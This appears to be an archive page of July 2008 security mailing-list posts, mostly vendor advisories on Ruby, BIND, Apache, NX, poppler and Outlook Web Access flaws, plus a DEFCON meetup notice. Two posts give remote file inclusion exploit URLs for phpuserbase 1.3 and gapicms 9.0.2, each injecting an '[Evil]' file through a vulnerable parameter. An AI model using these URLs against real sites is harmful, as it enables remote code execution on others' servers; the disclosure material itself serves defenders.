[ MDVSA-2008:140 ] - Updated ruby packages fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:140 http://www.mandriva.com/security/ ___ Package : ruby Date: July 9, 2008 Affected: 2008.1 ___ Problem Description: Multiple vulnerabilities have been found in the Ruby interpreter and in Webrick, the webserver bundled with Ruby. Directory traversal vulnerability in WEBrick in Ruby 1.9.0 and earlier, when using NTFS or FAT filesystems, allows remote attackers to read arbitrary CGI files via a trailing (1) + (plus), (2) %2b (encoded plus), (3) . (dot), (4) %2e (encoded dot), or (5) %20 (encoded space) character in the URI, possibly related to the WEBrick::HTTPServlet::FileHandler and WEBrick::HTTPServer.new functionality and the :DocumentRoot option. (CVE-2008-1891) Multiple integer overflows in the rb_str_buf_append function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allow context-dependent attackers to execute arbitrary code or cause a denial of service via unknown vectors that trigger memory corruption. (CVE-2008-2662) Multiple integer overflows in the rb_ary_store function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, and 1.8.7 before 1.8.7-p22 allow context-dependent attackers to execute arbitrary code or cause a denial of service via unknown vectors. (CVE-2008-2663) The rb_str_format function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allows context-dependent attackers to trigger memory corruption via unspecified vectors related to alloca. (CVE-2008-2664) Integer overflow in the rb_ary_splice function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, and 1.8.7 before 1.8.7-p22 allows context-dependent attackers to trigger memory corruption via unspecified vectors, aka the REALLOC_N variant. (CVE-2008-2725) Integer overflow in the rb_ary_splice function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allows context-dependent attackers to trigger memory corruption, aka the beg + rlen issue. (CVE-2008-2726) Integer overflow in the rb_ary_fill function in array.c in Ruby before revision 17756 allows context-dependent attackers to cause a denial of service (crash) or possibly have unspecified other impact via a call to the Array#fill method with a start (aka beg) argument greater than ARY_MAX_SIZE. (CVE-2008-2376) The updated packages have been patched to fix these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1891 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2662 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2663 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2664 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2725 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2726 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2376 ___ Updated Packages: Mandriva Linux 2008.1: 0e1e1ae20f5896be9834c92122ca7370 2008.1/i586/ruby-1.8.6-9p114.1mdv2008.1.i586.rpm 36d73cca1086770e7279fd1dd14e4e2f 2008.1/i586/ruby-devel-1.8.6-9p114.1mdv2008.1.i586.rpm 587b0727fe52509778bf1848e5a83de3 2008.1/i586/ruby-doc-1.8.6-9p114.1mdv2008.1.i586.rpm 04f6c795bc9b7e54f055e0da561ca045 2008.1/i586/ruby-tk-1.8.6-9p114.1mdv2008.1.i586.rpm b7598818fcbe7488f1d2e65a4881aa6a 2008.1/SRPMS/ruby-1.8.6-9p114.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 8de0e1cf1ca63db2336406dbdddf293d 2008.1/x86_64/ruby-1.8.6-9p114.1mdv2008.1.x86_64.rpm 93a8132e84bd61ef5bc79e5833075fa2 2008.1/x86_64/ruby-devel-1.8.6-9p114.1mdv2008.1.x86_64.rpm 0b6b2455e98dfbaf65cf91094fc3ca09 2008.1/x86_64/ruby-doc-1.8.6-9p114.1mdv2008.1.x86_64.rpm ca1998f680630b126d243135f765e8e2 2008.1/x86_64/ruby-tk-1.8.6-9p114.1mdv2008.1.x86_64.rpm b7598818fcbe7488f1d2e65a4881aa6a 2008.1/SRPMS/ruby-1.8.6-9p114.1mdv2008.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If y
[ MDVSA-2008:141 ] - Updated ruby packages fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:141 http://www.mandriva.com/security/ ___ Package : ruby Date: July 9, 2008 Affected: 2007.1, 2008.0, Corporate 4.0 ___ Problem Description: Multiple vulnerabilities have been found in the Ruby interpreter and in Webrick, the webserver bundled with Ruby. Directory traversal vulnerability in WEBrick in Ruby 1.8 before 1.8.5-p115 and 1.8.6-p114, and 1.9 through 1.9.0-1, when running on systems that support backslash (\) path separators or case-insensitive file names, allows remote attackers to access arbitrary files via (1) ..%5c (encoded backslash) sequences or (2) filenames that match patterns in the :NondisclosureName option. (CVE-2008-1145) Directory traversal vulnerability in WEBrick in Ruby 1.9.0 and earlier, when using NTFS or FAT filesystems, allows remote attackers to read arbitrary CGI files via a trailing (1) + (plus), (2) %2b (encoded plus), (3) . (dot), (4) %2e (encoded dot), or (5) %20 (encoded space) character in the URI, possibly related to the WEBrick::HTTPServlet::FileHandler and WEBrick::HTTPServer.new functionality and the :DocumentRoot option. (CVE-2008-1891) Multiple integer overflows in the rb_str_buf_append function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allow context-dependent attackers to execute arbitrary code or cause a denial of service via unknown vectors that trigger memory corruption. (CVE-2008-2662) Multiple integer overflows in the rb_ary_store function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, and 1.8.7 before 1.8.7-p22 allow context-dependent attackers to execute arbitrary code or cause a denial of service via unknown vectors. (CVE-2008-2663) The rb_str_format function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allows context-dependent attackers to trigger memory corruption via unspecified vectors related to alloca. (CVE-2008-2664) Integer overflow in the rb_ary_splice function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, and 1.8.7 before 1.8.7-p22 allows context-dependent attackers to trigger memory corruption via unspecified vectors, aka the REALLOC_N variant. (CVE-2008-2725) Integer overflow in the rb_ary_splice function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allows context-dependent attackers to trigger memory corruption, aka the beg + rlen issue. (CVE-2008-2726) Integer overflow in the rb_ary_fill function in array.c in Ruby before revision 17756 allows context-dependent attackers to cause a denial of service (crash) or possibly have unspecified other impact via a call to the Array#fill method with a start (aka beg) argument greater than ARY_MAX_SIZE. (CVE-2008-2376) The updated packages have been patched to fix these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1145 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1891 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2662 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2663 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2664 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2725 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2726 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2376 ___ Updated Packages: Mandriva Linux 2007.1: c252d5ada64ffce7573bc6e0d2184732 2007.1/i586/ruby-1.8.5-5.2mdv2007.1.i586.rpm 7c1687d94932963aed642743b1843212 2007.1/i586/ruby-devel-1.8.5-5.2mdv2007.1.i586.rpm cb3097b6b931faeb143924fbee1d3a28 2007.1/i586/ruby-doc-1.8.5-5.2mdv2007.1.i586.rpm d29d868f062bad90621381d386472777 2007.1/i586/ruby-tk-1.8.5-5.2mdv2007.1.i586.rpm 33d63f4835688a0ab7581c362e75dd64 2007.1/SRPMS/ruby-1.8.5-5.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 724556ab63e935db4a9f45612058936c 2007.1/x86_64/ruby-1.8.5-5.2mdv2007.1.x86_64.rpm 6ec3a76f976514e17fb99711e3cc68e3 2007.1/x86_64/ruby-devel-1.8.5-5.2mdv2007.1.x86_64.rpm 5c9deb0ff0b1696e8218f5000343bfac 2007.1/x86_64/ruby-doc-1.8.5-5.2mdv2007.1.x86_64.rpm ec156fb4f2f8f734b4f89a9aa16a62e8 2007.1/x86_64/ruby-tk-1.8.5-5.2mdv2007.1.x86_64.rpm 33d63f4835688a0ab7581c362e75dd64 2007.1/SRPMS/ruby-1.8.5-5.2mdv2007.1.src.rpm Mandriva Linux 2008.0: 89f70e454462048226c6059b95652f25 2008.0/i586/ruby
London DEFCON July meet - DC4420 - Thursday 10th July (today!)
hey all, it's that time of the month again! so we present to you : DC4420 July @ the Glassblower! - Thursday July 10th Talks - Shell2VNC <-> VNC2Shell - Rich Smith & Alberto Revelli - Network Intrusion Detection & Prevention with Snort - Leon - Bluetooth stuff - Dominic (don't miss this - last chance to see etc) - 5 minute slot - TBC Please get in touch if you would like to talk at the late August/September meeting. Also, please get in touch with MM or me if you would like to talk at the Aug/Sept meeting, July is now full :-) There will be workshops after the talks - please bring locks + picks if you have them (and are legally entitled to carry them!) :P Where? Upstairs @ Glassblower http://maps.google.com/maps?f=q&hl=en&geocode=&q=W1B+5DL&ie=UTF8&ll=51.510625,-0.136878&spn=0.00629,0.021415&z=16&iwloc=addr 42 Glasshouse St, Piccadilly, W 1B 5JY doors open from 7, speaking starts from 7.30 - please try and be prompt as some people need to go early to get trains back out of London. we have private use of the whole of the upstairs till close. real ale on draught : Adnams Broadside + Spitfire, 'Buccomb' and 'Doombar'. other stuff on draught : Guinness, Staropramen, Hoegaarden, Leffe. even more stuff on draught : Becks, Fosters, 1664 food menu is extensive and most importantly : they do Pie. as always, details & discussions here: http://dc4420.org cheers, //alien
[ GLSA 200807-06 ] Apache: Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200807-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Apache: Denial of Service Date: July 09, 2008 Bugs: #222643, #227111 ID: 200807-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in Apache might lead to a Denial of Service. Background == The Apache HTTP server is one of the most popular web servers on the Internet. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-servers/apache < 2.2.9 >= 2.2.9 Description === Multiple vulnerabilities have been discovered in Apache: * Dustin Kirkland reported that the mod_ssl module can leak memory when the client reports support for a compression algorithm (CVE-2008-1678). * Ryujiro Shibuya reported that the ap_proxy_http_process_response() function in the mod_proxy module does not limit the number of forwarded interim responses (CVE-2008-2364). * sp3x of SecurityReason reported a Cross-Site Request Forgery vulnerability in the balancer-manager in the mod_proxy_balancer module (CVE-2007-6420). Impact == A remote attacker could exploit these vulnerabilities by connecting to an Apache httpd, by causing an Apache proxy server to connect to a malicious server, or by enticing a balancer administrator to connect to a specially-crafted URL, resulting in a Denial of Service of the Apache daemon. Workaround == There is no known workaround at this time. Resolution == All Apache users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-servers/apache-2.2.9" References == [ 1 ] CVE-2007-6420 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6420 [ 2 ] CVE-2008-1678 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1678 [ 3 ] CVE-2008-2364 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2364 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200807-06.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
rPSA-2008-0223-1 poppler
rPath Security Advisory: 2008-0223-1 Published: 2008-07-09 Products: rPath Linux 2 Rating: Major Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: [EMAIL PROTECTED]:2/0.6.2-2-0.1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-2649 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2950 http://www.ocert.org/advisories/ocert-2008-007.html Description: Previous versions of the poppler package contain a memory-management bug that may allow user-assisted attackers to execute arbitrary code using maliciously crafted PDF files. Note that applications linked against libpoppler may also be affected by this vulnerability, and will be fixed by this update. http://wiki.rpath.com/Advisories:rPSA-2008-0223 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
phpuserbase 1.3 (menu) Remote File Inclusion Vulnerability
phpuserbase 1.3 (menu) Remote File Inclusion Vulnerability [~] Found : Ghost Hacker [ R-H TeaM ] |, .-. .-. ,| [~] HOME : www.Real-Hack.net | )(_o/ \o_)( | [~] Email : [EMAIL PROTECTED] |/ /\ \| [~] Script : phpuserbase 1.3 [~] Download Script : http://sourceforge.net/project/showfiles.php?group_id=200632 ## [ I love the Messenger of Allah Mohammad ] ## [~] Error ( phpUserBase_1_3_BETA/templates/default/header.inc.php ) [~] Exploit : http:///[path]/phpUserBase_1_3_BETA/templates/default/header.inc.php?menu=[Evil] ## [ I love the Messenger of Allah Mohammad ] ## [~] Greetz : PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB & Mr.JUVE & Mr.hope & LeGeNd HaCkEr .. Root Hacker & Jiko & ScarY.HaCkEr & Qptan & the-pirate.org & My Blog [ gh0st10.wordpress.com ] All Member Real Hack And All My Friends .. Real Hack Team ( R-H ) .. _ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
[ GLSA 200807-07 ] NX: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200807-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: NX: User-assisted execution of arbitrary code Date: July 09, 2008 Bugs: #230147 ID: 200807-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis NX uses code from the X.org X11 server which is prone to multiple vulnerabilities. Background == NoMachine's NX establishes remote connections to X11 desktops over small bandwidth links. NX and NX Node are the compression core libraries, whereas NX is used by FreeNX and NX Node by the binary-only NX servers. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-misc/nxnode < 3.2.0-r3>= 3.2.0-r3 2 net-misc/nx < 3.2.0-r2>= 3.2.0-r2 --- 2 affected packages on all of their supported architectures. --- Description === Multiple integer overflow and buffer overflow vulnerabilities have been discovered in the X.Org X server as shipped by NX and NX Node (GLSA 200806-07). Impact == A remote attacker could exploit these vulnerabilities via unspecified vectors, leading to the execution of arbitrary code with the privileges of the user on the machine running the NX server. Workaround == There is no known workaround at this time. Resolution == All NX Node users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/nxnode-3.2.0-r3" All NX users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/nx-3.2.0-r2" References == [ 1 ] GLSA 200806-07 http://www.gentoo.org/security/en/glsa/glsa-200806-07.xml Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200807-07.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability
## gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability ## [~] Found : Ghost Hacker [ R-H TeaM ] |, .-. .-. ,| [~] HOME : www.Real-Hack.net | )(_o/ \o_)( | [~] Email : [EMAIL PROTECTED] |/ /\ \| [~] Script : gapicms v9.0.2 [~] Download Script : http://heanet.dl.sourceforge.net/sourceforge/gapicms/gapicms_v9.0.2stable.tar.gz # [ I love the Messenger of Allah Mohammad ] # [~] Error ( ktmlpro/includes/ktedit/toolbar.php ) [~] Exploit : http:///[path]/ktmlpro/includes/ktedit/toolbar.php?dirDepth=[Evil] # [ I love the Messenger of Allah Mohammad ] [~] Greetz : PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB & Mr.JUVE & Mr.hope & LeGeNd HaCkEr .. Root Hacker & Jiko & ScarY.HaCkEr & Qptan & the-pirate.org & My Blog [ gh0st10.wordpress.com ] All Member Real Hack And All My Friends .. ## Real Hack Team ( R-H ) .. ## _ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Re: Microsoft DNS patch KB951748 incompatible with Zonealarm FIXED
all versions of zonealarm have been updated and are ready for download here: http://download.zonealarm.com/bin/free/pressReleases/2008/LossOfInternetAccessIssue.html After installing the updates, you can move the security level to high once again. The new versions can be installed as updates or clean installs. Rebooting will be required.
Nessus plugins for recent MS Bulletins
We have released Nessus plugins for the recently published Microsoft bulletins. The same can be downloaded at, http://www.secpod.org/nessus-plugins/. These have been tested with Nessus 2.2.4 and released under GPL. We'll continue to release these plugins under GPL for the upcoming threats. Thanks, Chandra.
[ MDVSA-2008:142 ] - Updated ruby packages fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:142 http://www.mandriva.com/security/ ___ Package : ruby Date: July 9, 2008 Affected: Corporate 3.0 ___ Problem Description: Multiple vulnerabilities have been found in the Ruby interpreter and in Webrick, the webserver bundled with Ruby. Directory traversal vulnerability in WEBrick in Ruby 1.8 before 1.8.5-p115 and 1.8.6-p114, and 1.9 through 1.9.0-1, when running on systems that support backslash (\) path separators or case-insensitive file names, allows remote attackers to access arbitrary files via (1) ..%5c (encoded backslash) sequences or (2) filenames that match patterns in the :NondisclosureName option. (CVE-2008-1145) Multiple integer overflows in the rb_str_buf_append function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allow context-dependent attackers to execute arbitrary code or cause a denial of service via unknown vectors that trigger memory corruption, a different issue than CVE-2008-2663, CVE-2008-2664, and CVE-2008-2725. (CVE-2008-2662) Multiple integer overflows in the rb_ary_store function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, and 1.8.7 before 1.8.7-p22 allow context-dependent attackers to execute arbitrary code or cause a denial of service via unknown vectors, a different issue than CVE-2008-2662, CVE-2008-2664, and CVE-2008-2725. (CVE-2008-2663) The rb_str_format function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allows context-dependent attackers to trigger memory corruption via unspecified vectors related to alloca, a different issue than CVE-2008-2662, CVE-2008-2663, and CVE-2008-2725. (CVE-2008-2664) Integer overflow in the rb_ary_splice function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, and 1.8.7 before 1.8.7-p22 allows context-dependent attackers to trigger memory corruption via unspecified vectors, aka the REALLOC_N variant, a different issue than CVE-2008-2662, CVE-2008-2663, and CVE-2008-2664. (CVE-2008-2725) Integer overflow in the rb_ary_splice function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allows context-dependent attackers to trigger memory corruption, aka the beg + rlen issue. (CVE-2008-2726) Integer overflow in the rb_ary_fill function in array.c in Ruby before revision 17756 allows context-dependent attackers to cause a denial of service (crash) or possibly have unspecified other impact via a call to the Array#fill method with a start (aka beg) argument greater than ARY_MAX_SIZE. (CVE-2008-2376) The updated packages have been patched to fix these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1145 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2662 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2663 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2664 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2725 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2726 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2376 ___ Updated Packages: Corporate 3.0: 078849cb78d43bbe44aed5faba17ce36 corporate/3.0/i586/ruby-1.8.1-1.10.C30mdk.i586.rpm 0c7e275a33a125c790cd109d67ff7355 corporate/3.0/i586/ruby-devel-1.8.1-1.10.C30mdk.i586.rpm 1e30796a41e440eb9a1ca6589737bd88 corporate/3.0/i586/ruby-doc-1.8.1-1.10.C30mdk.i586.rpm 0414d9413e6d5fbed3cad3096ca1e23c corporate/3.0/i586/ruby-tk-1.8.1-1.10.C30mdk.i586.rpm c75fdfc1387b13c4fe50f929b9125516 corporate/3.0/SRPMS/ruby-1.8.1-1.10.C30mdk.src.rpm Corporate 3.0/X86_64: 4b6992996fe4d1df03c189bdd51b14bc corporate/3.0/x86_64/ruby-1.8.1-1.10.C30mdk.x86_64.rpm 475a0ee98a513a4d2aada6fdbe33ff9c corporate/3.0/x86_64/ruby-devel-1.8.1-1.10.C30mdk.x86_64.rpm 8fc454cc2d5edb758958e72ee2f92d03 corporate/3.0/x86_64/ruby-doc-1.8.1-1.10.C30mdk.x86_64.rpm dfac76704ce02fd86b5fc8e29bd8ea34 corporate/3.0/x86_64/ruby-tk-1.8.1-1.10.C30mdk.x86_64.rpm c75fdfc1387b13c4fe50f929b9125516 corporate/3.0/SRPMS/ruby-1.8.1-1.10.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for secur
Context IS Advisory - MS08-39 OWA XSS
===ADVISORY=== Systems Affected:Microsoft Outlook Web Access 2003 and 2007 (Exchange Server 2003 SP2, Exchange Server 2007, Exchange Server 2007 SP1) Severity:High Category:Cross Site Scripting, Cross Site Request Forgery Author: Context Information Security Ltd Reported to vendor: 10th January 2008 Advisory Issued: 10th July 2008 ===ADVISORY=== Description --- Several Cross Site Scripting vulnerabilities were found in within Outlook Web Access (OWA) 2003/2007. An attacker can craft a malicious email which will trigger within a user's browser. Different version of OWA and different clients (Light and Premium) have different attack vectors which can result in an attacker gaining *persistent* control over a victim's use of Outlook Web Access. An attacker would have full control and access to the victims e-mail account. This control could be further abused by utilising techniques such as JavaScript root-kits or web worms. Analysis An attacker can craft a malicious email which contains the attack strings to compromise an OWA client. The user would only need to view the email to be victim to the XSS attack. Furthermore, persistent XSS can be gained by changing certain values within OWA to a particular XSS attack string. This string (consisting of HTML/JavaScript) is subsequently injected into *any* page which uses this value, including "new email", "reply email" (for OWA 2003) and most pages (for OWA 2007). Logging out of the application and back in will not clear the attack. Furthermore, the attack can be propagated by using the control over the OWA client to email the attack link to all users in the victim's inbox/contacts. At this point the attack would spread as a XSS worm (albeit one requiring the user to view the incoming email). This could potentially affect all users of the OWA application. Technologies Affected - Microsoft Exchange Server 2003 Microsoft Exchange Server 2007 Microsoft Exchange Server 2007 SP1 Vendor Response --- On 9th July 2008, Microsoft issued a security bulletin MS08-039 and an associated patch for Exchange Server 2003 and Exchange Server 2007 SP1 Patches are available from: http://www.microsoft.com/technet/security/bulletin/ms08-039.mspx Context would recommend that these patches be installed as soon as practical to all Exchange Servers providing OWA functionality. CVE --- This issue has been assigned CVE numbers CVE-2008-2247 and CVE-2008-2248. Disclosure Timeline --- 10 January 2008 - Initial Discovery and vendor notification. 14th January 2008 - Vendor response requesting further details. 14th March 2008 - Vendor response requesting PoC. PoC provided. 9th July 2008 - Vendor advisory release. 10th July 2008 - Context Information Security Ltd advisory release. Credits Michael Jordon of Context Information Security Ltd About Context Information Security -- Context Information Security Limited is a specialist information security consultancy based in London and Frankfurt. Context promotes the holistic approach to information security and helps clients to identify, assess and control their exposure to risk within the fields of IT, telephony and physical security. Context employs experienced information security professionals who are subject-matter experts in their various technical specialism's. Context works extensively within the finance, legal, defence and government sectors, delivering high-end information security projects to organisations for which security is a priority. Web:www.contextis.co.uk Email: [EMAIL PROTECTED]
[ MDVSA-2008:139 ] - Updated BIND packages fix critical DNS vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:139 http://www.mandriva.com/security/ ___ Package : bind Date: July 9, 2008 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 ___ Problem Description: A weakness was found in the DNS protocol by Dan Kaminsky. A remote attacker could exploit this weakness to spoof DNS entries and poison DNS caches. This could be used to misdirect users and services; i.e. for web and email traffic (CVE-2008-1447). This update provides the latest stable BIND releases for all platforms except Corporate Server/Desktop 3.0 and MNF2, which have been patched to correct the issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 ___ Updated Packages: Mandriva Linux 2007.1: 73cc24fc9586b7ab290d755012c16a79 2007.1/i586/bind-9.4.2-0.1mdv2007.1.i586.rpm 70867c50cfd64b4406aa002d627d740b 2007.1/i586/bind-devel-9.4.2-0.1mdv2007.1.i586.rpm 3603e9d9115466753397a1f472011703 2007.1/i586/bind-utils-9.4.2-0.1mdv2007.1.i586.rpm cf5e4100ecb21a4eb603831e5a6ec23d 2007.1/SRPMS/bind-9.4.2-0.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 4eb7ce0984d3ce3befff667392e3bf3e 2007.1/x86_64/bind-9.4.2-0.1mdv2007.1.x86_64.rpm d7b9a9e7d4c52a5b0c54f59ca20bf2d5 2007.1/x86_64/bind-devel-9.4.2-0.1mdv2007.1.x86_64.rpm c5c66c9609615029d2f07f7b09a63118 2007.1/x86_64/bind-utils-9.4.2-0.1mdv2007.1.x86_64.rpm cf5e4100ecb21a4eb603831e5a6ec23d 2007.1/SRPMS/bind-9.4.2-0.1mdv2007.1.src.rpm Mandriva Linux 2008.0: 52dfe3970fcd9495b2bb9379a9312b25 2008.0/i586/bind-9.4.2-1mdv2008.0.i586.rpm 97d20d35b6814aa2f9fab549ca6237c0 2008.0/i586/bind-devel-9.4.2-1mdv2008.0.i586.rpm 87a7bb3dd25abd8cd882a8f2fdc2398e 2008.0/i586/bind-utils-9.4.2-1mdv2008.0.i586.rpm daa8074e6ede39dfa557fb258db7 2008.0/SRPMS/bind-9.4.2-1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: b9d0337363bc1e2b14505f25d4ee5f99 2008.0/x86_64/bind-9.4.2-1mdv2008.0.x86_64.rpm 9b75e2a96784c00c2912bc3bf333d089 2008.0/x86_64/bind-devel-9.4.2-1mdv2008.0.x86_64.rpm 0a593b090d9e6bda3666e234056e19ba 2008.0/x86_64/bind-utils-9.4.2-1mdv2008.0.x86_64.rpm daa8074e6ede39dfa557fb258db7 2008.0/SRPMS/bind-9.4.2-1mdv2008.0.src.rpm Mandriva Linux 2008.1: 2534ef007262d4ea2d219bab0190466c 2008.1/i586/bind-9.5.0-3mdv2008.1.i586.rpm c3feee5d05aa3aee14cd70a2d295d0b1 2008.1/i586/bind-devel-9.5.0-3mdv2008.1.i586.rpm f306c06665b723a2530258e6d1dbdae2 2008.1/i586/bind-doc-9.5.0-3mdv2008.1.i586.rpm 967ef80628f92160930bc3a3827a216e 2008.1/i586/bind-utils-9.5.0-3mdv2008.1.i586.rpm 70fc7a7964944a2926979710c5148ed1 2008.1/SRPMS/bind-9.5.0-3mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 3f4d96d7a7f913c141e1f63cdc7e7336 2008.1/x86_64/bind-9.5.0-3mdv2008.1.x86_64.rpm 420db658366763686198f41394aa72b3 2008.1/x86_64/bind-devel-9.5.0-3mdv2008.1.x86_64.rpm 6f3674f68311494c5a9ff0dbce831e82 2008.1/x86_64/bind-doc-9.5.0-3mdv2008.1.x86_64.rpm 